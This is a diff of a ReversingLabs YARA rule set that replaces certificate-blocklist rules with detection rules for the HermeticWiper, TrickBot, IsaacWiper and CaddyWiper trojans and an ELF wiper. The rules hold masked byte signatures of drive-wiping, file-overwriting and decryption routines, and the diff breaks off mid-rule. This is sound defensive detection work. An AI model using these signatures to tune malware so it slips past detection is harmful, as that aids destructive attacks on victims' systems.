+            ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 01 D0 39 45
+            ?? 89 45 ?? 77 ?? 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? C7 45
+            ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 75 ?? EB ?? 31 C9 89 4C 24 ?? 8B 45 ?? 89
+            1C 24 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 7C 24 ?? 89 1C 24 89 44 24 ?? E8
+            ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 76 ?? B8 ?? ?? ?? ?? 89 74 24
+            ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C
+            24 E8 ?? ?? ?? ?? 80 7D ?? ?? 75 ?? A1 ?? ?? ?? ?? 89 7D ?? 89 45 ?? 8B 45 ?? 89 45
+            ?? 8D 45 ?? 89 44 24 ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ??
+            8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? 31 FF 89 1C
+            24 E8 ?? ?? ?? ?? 31 C0 89 44 24 ?? 89 7C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 75 ?? C7
+            45 ?? ?? ?? ?? ?? 85 F6 74 ?? 8D 75 ?? 8D 76 ?? B9 ?? ?? ?? ?? 89 74 24 ?? 89 4C 24
+            ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 89 1C 24
+            E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3
+        }
+		$destroy_files_using_overwrite = {
+            55 89 E5 83 EC ?? 89 5D ?? 8B 5D ?? 8D 45 ?? 89 75 ?? 89 7D ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 5D ?? 8B 75
+            ?? 8B 7D ?? 89 EC 5D C3
+        }
+		$redundant_reboot_attempts = {
+            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 8D 76 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? 31 D2 83 C4 ?? 89 D0 59 5B 5E 5F 5D 8D 61 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAT11 d.o.o." and pe.signatures [ i ] . serial == "01:80:93:cf:ad:72:cd:f4:02:ee:cb:e1:8b:33:ec:71" and 1602000390 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $destroy_files_using_ioctls ) and ( $destroy_files_using_overwrite ) and ( $redundant_reboot_attempts )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_569E03988Af60D80Ce60728940850D9B : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Hermeticwiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HermeticWiper trojan."
 		author = "ReversingLabs"
-		id = "a4432990-8c2f-523c-8a9d-cba578aaefc5"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "252dfb3d-9d4e-51a4-80c9-64e17922d997"
+		date = "2022-02-24"
+		modified = "2022-02-24"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5824-L5842"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.HermeticWiper.yara#L1-L50"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3ea894d9e088c2123f9ec87cbf097e2275fae18cad26e926641fe64921808b1e"
+		logic_hash = "0fa519ce8285ffe4e49c2a301e8a0fd0516a05dc6b41ee0b010fdc76dd6e195e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "HermeticWiper"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$corrupt_physical_drive = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F
+            11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
+            BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ??
+            50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ??
+            75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ??
+            ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ??
+            ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90
+            8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70
+            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ??
+            ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70
+            ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89
+            4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85
+            DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ??
+            FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E
+            5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ??
+            5F 5E 5B 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" or pe.signatures [ i ] . serial == "56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" ) and 1601006510 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $corrupt_physical_drive )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_418F6D959A8A0F82Bef07Ceba3603E52 : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Trickbot : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TrickBot trojan."
 		author = "ReversingLabs"
-		id = "ecfb72ef-04c4-55b6-b9e0-e95053e03425"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4ed253cc-0398-542b-a2b7-c42a0b9431fb"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5844-L5862"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.TrickBot.yara#L1-L46"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6c13c5e85d6e053319193d1d94f216eeec64405c86d15971419078a1ce6c8ac9"
+		logic_hash = "e10f16c70f1ff7cf11d3e25f06e4c5d9e20c51688582d2b51322f768a8e06d7e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "TrickBot"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$entry_setup = {
+            58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5]
+            89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1)
+            [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ??
+            ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2
+        }
+		$decrypt_function_snippet = {
+            58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3
+        }
+		$decrypt_function_snippet_wrapper = {
+            55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? ?? 03 C8
+            89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A
+            ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ??
+            49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? FF
+            D0
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" or pe.signatures [ i ] . serial == "41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" ) and 1601928240 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $entry_setup and ( $decrypt_function_snippet or $decrypt_function_snippet_wrapper )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5378C5Bbeba0D3309A35Bb47F63037F7 : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Isaacwiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects IsaacWiper trojan."
 		author = "ReversingLabs"
-		id = "7f367505-d7c1-5b8c-83bd-df3fec789d12"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c0924e5e-a942-57a3-a9f9-e6be6efa4c73"
+		date = "2022-03-02"
+		modified = "2022-03-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5864-L5882"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.IsaacWiper.yara#L1-L76"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a96acf93ca6da4d3bf5177b51996825cd3ea70443577622deccdd11fde579c31"
+		logic_hash = "c9fa43f44c33816a66f61255d101294da63df1afc5a27ed5817072040cd1eec5"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "IsaacWiper"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enumerate_physical_drives = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 F6 89 55 ?? 57 89 4D ?? B3 ?? C7 45 ?? ?? ?? ??
+            ?? 89 75 ?? 84 DB 0F 84 ?? ?? ?? ?? 8B D6 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D
+            8D ?? ?? ?? ?? BF ?? ?? ?? ?? 89 45 ?? 2B F8 83 C4 ?? 66 83 7D ?? ?? 8D 0C 41 8D 45
+            ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D 04 45 ?? ?? ?? ?? 50 8B
+            C2 8D 14 3F 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C7 8D 48 ?? 0F 46 C1 8B 4D ?? 03 C8
+            89 4D ?? 83 F9 ?? 73 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 50 B3 ?? FF D7 83 F8 ?? 74 ?? 46 50 89 75 ?? FF 15 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 32 DB E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83
+            ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 85 C0 0F 95 C1 66 85 C0 0F 84 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D 4D ?? BE ?? ?? ?? ?? 89 45 ?? 2B F0 83 C4 ?? 66 83
+            7D ?? ?? 8D 0C 41 8D 45 ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D
+            04 45 ?? ?? ?? ?? 50 8B C2 8D 14 36 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C6 8D 48 ??
+            0F 46 C1 8B 4D ?? 03 C8 89 4D ?? 83 F9 ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF D7 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 45
+            ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ??
+            ?? ?? ?? 83 F8 ?? 0F 94 C3 75 ?? 33 C0 83 7D ?? ?? 0F 44 45 ?? 89 45 ?? 56 FF 15 ??
+            ?? ?? ?? 84 DB EB ?? 84 C9 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B D3 8B 4D ?? 6A ?? E8 ?? ??
+            ?? ?? 8B 7D ?? 8A C8 83 C4 ?? 33 F6 84 C9 74 ?? 3B F3 74 ?? 6A ?? 8B D6 8B CF E8 ??
+            ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 46 84 C9 74 ?? 8B 5D ?? 3B F3 73 ??
+            6A ?? 8B D6 8B CF E8 ?? ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 8A C1 5F 5E
+            5B 8B E5 5D C3
+        }
+		$corrupt_drive_thread = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B 5D ?? 56 57 85 DB 0F 84 ?? ??
+            ?? ?? 83 7B ?? ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 8D 4C 24 ?? 03 C0 BA ?? ?? ?? ?? 50 53
+            E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? D1 E8 33 C9 66 89 4C 44 ?? 8D 44 24 ?? 50
+            FF D7 8B 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 6A ?? 8D 44 24 ?? 50
+            FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 8D 44 24
+            ?? 74 ?? 90 83 C0 ?? 66 83 38 ?? 75 ?? 8D 4C 24 ?? BA ?? ?? ?? ?? 2B C1 D1 F8 8D 04
+            45 ?? ?? ?? ?? 50 8B C1 8D 8C 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ??
+            ?? ?? ?? 50 FF D7 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 74 24
+            ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 7B ?? 8B 5B ?? C7 44 24 ?? ?? ?? ?? ?? 85 DB 75 ??
+            81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 8C 84 ?? ?? ?? ?? 8B D1 C1 EA ?? 33 D1 69
+            CA ?? ?? ?? ?? 03 C8 89 8C 84 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? BA ?? ?? ?? ?? 8D
+            B4 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 75 ??
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 94 ?? ?? ?? ?? 8B C1
+            C1 E8 ?? 42 33 C8 89 94 24 ?? ?? ?? ?? 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25
+            ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 89 06 83 C6 ?? 8D 84 24 ?? ?? ?? ??
+            3B F0 72 ?? 8B 74 24 ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
+            56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 3D ?? ?? ?? ?? 75 ?? 2B F8 83 DB ?? E9
+            ?? ?? ?? ?? 8B C7 0B C3 74 ?? 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44
+            24 ?? 6A ?? 50 57 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            5F 5E 33 C0 5B 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" or pe.signatures [ i ] . serial == "53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" ) and 1601427420 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enumerate_physical_drives and $corrupt_drive_thread )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Bab6A2Aa84B495D9E554A4C42C0126D : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Caddywiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CaddyWiper trojan."
 		author = "ReversingLabs"
-		id = "7b6d364c-3e27-5314-b604-d44bb408fc4e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ad437f29-4ad8-5a88-a0b6-03de55e7375f"
+		date = "2022-03-15"
+		modified = "2022-03-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5884-L5900"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.CaddyWiper.yara#L1-L95"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "79b6df421c78fd3e2f05a60f7d875e02519297a0278614c9f63dff8b1b2a2d18"
+		logic_hash = "178ff4171c09866f6b303bdff234beff1116d268995ee4dc236332e472d645b1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "CaddyWiper"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$destroy_if_not_controller = {
+            50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 39 ?? 75 ?? EB ?? 8D 55 ?? 52 FF 55 ??
+            C6 45 ?? 43 C6 45 ?? 3A C6 45 ?? 5C C6 45 ?? 55 C6 45 ?? 73 C6 45 ?? 65 C6 45 ?? 72
+            C6 45 ?? 73 C6 45 ?? 00 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D
+            ?? ?? 73 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 04 ?? 88 45 ?? EB ?? E8 ??
+            ?? ?? ?? 8B E5 5D C3
+        }
+		$erase_drive_data = {
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D ?? 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 55 ?? 8B 45 ?? 50 FF 55 ?? 8A 4D ?? 88 4D ?? 8A
+            55 ?? 80 EA ?? 88 55 ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$erase_drives_recursively_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF C6 85 ?? ?? ?? ?? 2A C6 85
+            ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 5C C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8B 4D
+            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? 00 00 00 00
+            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 64
+            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 73
+            C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6C
+            C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 41 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6B
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 72
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 33
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 32 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 2E
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 00
+            C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8
+        }
+		$erase_drives_recursively_2_p1 = {
+            8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 75 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E1 ?? 0F 84 ?? ?? ?? ?? 0F BE 95 ??
+            ?? ?? ?? 83 FA ?? 75 ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 0F BE 8D ?? ?? ?? ?? 83 F9
+            ?? 75 ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 75 ?? 8B 85 ?? ?? ?? ?? 83 E0 ??
